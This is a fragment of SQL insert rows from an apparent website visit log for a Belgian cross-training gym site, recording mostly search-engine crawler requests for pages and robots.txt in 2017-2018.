(77769, 1505541949.060618, 2637637432, 0, 0, 0, 0, 1, 'http://www2.crosstrainingcenter.be/notre-philosophie/', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(77770, 1505616052.271813, 3026316553, 0, 0, 0, 0, 1, 'http://www2.crosstrainingcenter.be/', '', ''),
(77771, 1505616054.372652, 3026316553, 0, 0, 0, 0, 1, 'http://www2.crosstrainingcenter.be/', '', ''),
(77772, 1505616059.748894, 3026316553, 0, 0, 0, 0, 1, 'http://www2.crosstrainingcenter.be/le-cross-training/', '', ''),
(77773, 1505616061.491457, 3026316553, 0, 0, 0, 0, 1, 'http://www2.crosstrainingcenter.be/notre-philosophie/', '', ''),
(77774, 1505616064.690115, 3026316553, 0, 0, 0, 0, 1, 'http://www2.crosstrainingcenter.be/les-seances-namur/', '', ''),
(77775, 1505616065.768481, 3026316553, 0, 0, 0, 0, 1, 'http://www2.crosstrainingcenter.be/en-images/', '', ''),
(77776, 1505616066.627581, 3026316553, 0, 0, 0, 0, 1, 'http://www2.crosstrainingcenter.be/lequipe/', '', ''),
(77777, 1505616069.850354, 3026316553, 0, 0, 0, 0, 1, 'http://www2.crosstrainingcenter.be/contact/', '', ''),
(77778, 1505644216.351653, 1123631127, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77779, 1505644216.831321, 1123631127, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77780, 1505644217.872520, 1123631127, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77781, 1505658523.668668, 1123631127, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77782, 1505658524.206599, 1123631127, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77783, 1505954328.214764, 1123631127, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77784, 1505954328.834466, 1123631127, 0, 1, 1, 0, 1, 'http://www2.crosstrainingcenter.be/coghykqnv.html', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77785, 1506350006.209974, 1123631576, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77786, 1506602270.309146, 2637637424, 0, 0, 0, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(77787, 1506646839.318620, 2637637520, 0, 0, 0, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(77788, 1506691621.879725, 2637637520, 0, 0, 0, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(77789, 1506863418.712453, 1123631121, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77790, 1506863419.258136, 1123631121, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77791, 1506877270.754270, 2637637520, 0, 0, 0, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(77792, 1506955289.702138, 1123631813, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77793, 1506955290.187742, 1123631813, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77794, 1507023435.601395, 2637637520, 0, 0, 0, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(77795, 1507160322.532178, 1123631127, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77796, 1507160323.106818, 1123631127, 0, 1, 1, 0, 1, 'http://www2.crosstrainingcenter.be/tskwrguygfsu.html', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77797, 1507200674.934904, 2637637378, 0, 0, 0, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(77798, 1507248123.792346, 2637637427, 0, 0, 0, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(77799, 1507248253.465015, 2637637451, 0, 0, 0, 0, 1, 'http://www2.crosstrainingcenter.be/notre-philosophie/', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(77800, 1507388362.290868, 2637637427, 0, 0, 0, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(77801, 1507525210.094136, 2637637394, 0, 0, 0, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(77802, 1507569133.571085, 2637637394, 0, 0, 0, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(77803, 1507714558.248073, 3475901895, 0, 0, 0, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(77804, 1507916530.045599, 2637637426, 0, 0, 0, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(77805, 1508064441.229140, 2637637402, 0, 0, 0, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(77806, 1508238005.592380, 2637637402, 0, 0, 0, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(77807, 1508284816.107941, 3475901895, 0, 0, 0, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(77808, 1508290515.646833, 1123631127, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77809, 1508290516.099680, 1123631127, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77810, 1508298929.574160, 1123631127, 0, 1, 1, 0, 1, 'http://www2.crosstrainingcenter.be/comments/feed/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77811, 1508300452.091497, 3475901697, 0, 0, 0, 0, 1, 'http://www2.crosstrainingcenter.be/notre-philosophie/', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(77812, 1508391812.886970, 1123635013, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77813, 1508391813.481592, 1123635013, 0, 1, 1, 0, 1, 'http://www2.crosstrainingcenter.be/wzbxfqya.html', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77814, 1508406750.657178, 3475901895, 0, 0, 0, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(77815, 1508661024.009716, 3427775505, 1, 0, 0, 0, 1, 'http://www2.crosstrainingcenter.be/notre-philosophie/', '', 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0;  Trident/5.0)'),
(77816, 1508719218.628154, 1123631576, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77817, 1508719219.237841, 1123631576, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77818, 1508729524.782647, 1123631576, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77819, 1508788536.191893, 1555588441, 1, 0, 0, 0, 1, 'http://www2.crosstrainingcenter.be/notre-philosophie/', 'https://www.google.fr/', 'Mozilla/5.0 (Linux; Android 7.0; SM-G950F Build/NRD90M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.98 Mobile Safari/537.36'),
(77820, 1508788538.589006, 1555588441, 0, 1, 0, 0, 0, 'http://www2.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www2.crosstrainingcenter.be/notre-philosophie/', 'Mozilla/5.0 (Linux; Android 7.0; SM-G950F Build/NRD90M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.98 Mobile Safari/537.36'),
(77821, 1508790172.535459, 3475901900, 0, 0, 0, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(77822, 1508790816.847133, 676177796, 0, 0, 0, 0, 1, 'http://www2.crosstrainingcenter.be/notre-philosophie/', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(77823, 1509047599.307313, 1123631752, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77824, 1509047599.844342, 1123631752, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77825, 1509377677.846396, 1123631127, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77826, 1509681212.482540, 1123634117, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77827, 1509681212.994542, 1123634117, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/notre-philosophie/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77828, 1509728666.992672, 1123634117, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77829, 1510838826.985099, 3475901899, 0, 0, 0, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(77830, 1510866157.434669, 2637637455, 0, 0, 0, 0, 1, 'http://www2.crosstrainingcenter.be/notre-philosophie/', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(77831, 1510944089.638715, 1123634076, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77832, 1510944090.276067, 1123634076, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77833, 1511310252.550127, 1123631813, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77834, 1511310253.062666, 1123631813, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/le-cross-training/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77835, 1511348178.330423, 1123631813, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/lequipe/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77836, 1511476923.414936, 2637637389, 0, 0, 0, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(77837, 1511480814.845983, 676177766, 0, 0, 0, 0, 1, 'http://www2.crosstrainingcenter.be/notre-philosophie/', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(77838, 1511855405.722245, 1123631127, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77839, 1511855406.493976, 1123631127, 0, 1, 1, 0, 1, 'http://www2.crosstrainingcenter.be/khciysmhfxophc.html', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77840, 1512199405.614400, 1123633996, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77841, 1512482513.376802, 1123634948, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77842, 1512482514.049722, 1123634948, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77843, 1512825924.999129, 1123631127, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77844, 1512825925.475391, 1123631127, 0, 1, 1, 0, 1, 'http://www2.crosstrainingcenter.be/bkjkuqbb.html', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77845, 1513488932.430248, 2637637433, 0, 0, 0, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(77846, 1513707652.772377, 1123631813, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77847, 1513790226.685018, 2637637378, 0, 0, 0, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(77848, 1513790335.432344, 3475901716, 0, 0, 0, 0, 1, 'http://www2.crosstrainingcenter.be/notre-philosophie/', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(77849, 1513794073.149586, 1123631813, 0, 1, 1, 0, 1, 'http://www2.crosstrainingcenter.be/siegsjmluleg.html', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77850, 1513794073.706279, 1123631813, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77851, 1513947905.381037, 1123631813, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77852, 1513947905.867027, 1123631813, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77853, 1513948253.960589, 1123631813, 0, 1, 1, 0, 1, 'http://www2.crosstrainingcenter.be/comments/feed/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77854, 1514096572.993784, 1123633421, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77855, 1514223500.352855, 1123631127, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77856, 1514546759.093066, 3475901892, 0, 0, 0, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(77857, 1514567164.532297, 3475901858, 0, 0, 0, 0, 1, 'http://www2.crosstrainingcenter.be/notre-philosophie/', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(77858, 1514578241.555956, 1123634998, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77859, 1514792490.294184, 1123631127, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77860, 1514796498.968215, 1123631127, 0, 1, 1, 0, 1, 'http://www2.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Googlebot-Image/1.0'),
(77861, 1515307854.792800, 1123631127, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77862, 1515307855.264886, 1123631127, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77863, 1516260883.400688, 1123631752, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77864, 1516260884.528817, 1123631625, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77865, 1516274470.891483, 1123631625, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77866, 1516464127.916504, 1123631813, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77867, 1517029111.918185, 1123631813, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77868, 1517829470.056227, 1123631173, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77869, 1517829470.805049, 1123631173, 0, 1, 1, 0, 1, 'http://www2.crosstrainingcenter.be/cyczwmgt.html', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77870, 1518054429.656813, 1123633950, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77871, 1518054430.203354, 1123633950, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77872, 1518707153.563902, 1123633541, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77873, 1518707154.166650, 1123633541, 0, 1, 1, 0, 1, 'http://www2.crosstrainingcenter.be/pavrdlvdjfjn.html', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77874, 1518931292.025661, 1123635045, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77875, 1519229415.901150, 1123631173, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77876, 1519428999.857048, 3639886562, 0, 0, 0, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)'),
(77877, 1519430236.319125, 3639886562, 0, 1, 0, 0, 1, 'http://www2.crosstrainingcenter.be/contact-2/', '', 'Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)'),
(77878, 1519567077.833050, 1123631813, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77879, 1519567078.413226, 1123631813, 0, 1, 1, 0, 1, 'http://www2.crosstrainingcenter.be/mpiijtgh.html', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77880, 1519688279.596383, 1123631813, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77881, 1519688280.073505, 1123631813, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77882, 1519688289.813598, 1123631813, 0, 1, 1, 0, 1, 'http://www2.crosstrainingcenter.be/comments/feed/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77883, 1519952918.306930, 1123634998, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77884, 1520058145.195863, 1123631813, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77885, 1520375952.541221, 1123631127, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77886, 1520883636.168394, 1123632617, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77887, 1520883636.707541, 1123632617, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/notre-philosophie/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77888, 1521092730.709925, 1123632617, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77889, 1521092731.226907, 1123632617, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77890, 1521112141.927171, 2637637391, 0, 0, 0, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(77891, 1521137248.646047, 3475901771, 0, 0, 0, 0, 1, 'http://www2.crosstrainingcenter.be/notre-philosophie/', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(77892, 1521401252.049674, 1123631127, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77893, 1521640111.670347, 2637637428, 0, 0, 0, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(77894, 1521684486.590686, 2637637391, 0, 0, 0, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(77895, 1521695380.679214, 1123631127, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77896, 1522035241.626787, 1123631127, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77897, 1522035242.149914, 1123631127, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77898, 1522324052.856670, 1123631813, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77899, 1522585096.919050, 1123631127, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77900, 1522585097.474643, 1123631127, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77901, 1522599894.856298, 1123631127, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77902, 1522616546.903191, 1123631127, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77903, 1522621946.147787, 1123631127, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/lequipe/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77904, 1522624644.510044, 1123631127, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/le-cross-training/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77905, 1523302140.369789, 1123631173, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77906, 1523302140.983677, 1123631173, 0, 1, 1, 0, 1, 'http://www2.crosstrainingcenter.be/bpxbssfzcep.html', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77907, 1524122255.328920, 1123631496, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77908, 1524122255.835624, 1123631496, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77909, 1524262696.463934, 1123635045, 0, 0, 1, 0, 1, 'http://www2.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(77910, 1524262697.059096, 1123635045, 0, 1, 1, 0, 1, 'http://www2.crosstrainingcenter.be/eszjluxfwv.html', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
